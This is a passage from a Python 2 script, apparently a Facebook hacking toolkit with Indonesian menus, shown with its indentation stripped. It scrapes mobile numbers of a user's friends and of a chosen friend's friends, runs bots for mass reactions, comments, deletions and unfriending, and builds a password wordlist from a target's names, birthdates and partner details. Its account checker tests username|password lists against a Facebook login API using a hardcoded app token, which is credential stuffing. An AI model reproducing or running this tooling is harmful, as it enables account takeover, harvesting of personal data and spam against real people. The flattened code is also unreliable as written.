raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
